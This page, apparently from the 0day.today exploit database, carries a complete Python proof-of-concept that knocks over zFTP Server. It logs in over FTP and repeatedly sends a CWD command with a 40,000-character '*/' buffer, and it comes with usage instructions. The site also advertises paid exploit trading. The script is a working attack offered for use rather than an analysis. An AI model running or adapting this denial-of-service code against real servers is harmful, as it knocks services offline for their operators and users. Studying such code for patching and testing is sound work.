0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
zFTP Server "cwd/stat" Remote Denial-of-Service
[#!/usr/bin/python
# Exploit Title: zFTP Server "cwd" Remote Denial-of-Service
# Date: 2011-10-24
# Author: Myo Soe < YGN Ethical Hacker Group, Myanmar - http://yehg.net/ >
# Version: 2011-04-13 08:59
# Tested on: Windows XP, 2K3
import socket
import sys
import time
author = '(c) Myo Soe < YGN Ethical Hacker Group, Myanmar - http://yehg.net/ >'
# server
server = 'zFTP Server version 2011-04-13 08:59'
title = ' "cwd" Remote Denial-of-Service Proof-of-Concept'
# payload
buffer= '*/' * 20000
cmd = "CWD"
payload = cmd + ' ' + buffer
pre_msg = 'Sending STAT DoS ... This may take a while '
post_msg = 'Job Done!'
def trigger(host, port, user, passw):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
try:
sock.connect((host, port))
except:
sys.stderr.write(now() + 'ERROR: Cannot Connect to '+ host + ':' + str(port) + '\r\n')
sys.exit(1)
r=sock.recv(1024)
sock.send("USER " + user + "\r\n")
r=sock.recv(1024)
sock.send("PASS " + passw + "\r\n")
r=sock.recv(1024)
if 'Login not accepted' in r:
sys.stderr.write(now() + 'ERROR: Incorrect username or password')
sys.exit(1)
print now(), pre_msg, '\r\n'
try:
for i in range(1,10):
print "#",i
sock.send(payload + "\r\n")
time.sleep(5)
except Exception, err:
if 'Connection reset by peer' in str(err):
print '\r\n',now(), server, ' has crashed'
else:
sys.stderr.write('\r\n' + now() + 'ERROR: %s\r\n' % str(err) + '\r\nWait a few seconds to see the server crashed\r\n')
sock.close()
print '\r\n',now(),post_msg
def now():
return time.strftime("[%Y-%m-%d %X] ")
def banner():
print "\r\n",server,title,"\r\n",author,"\r\n\r\n"
def help():
print "Usage: poc.py IP username password"
def main():
banner()
if len(sys.argv) <> 4:
help()
sys.exit(1)
else:
host = sys.argv[1]
user = sys.argv[2]
passw = sys.argv[3]
trigger(host,21,user,passw)
sys.exit(0)
if __name__ == '__main__':
main()
# 0day.today [2024-11-15] #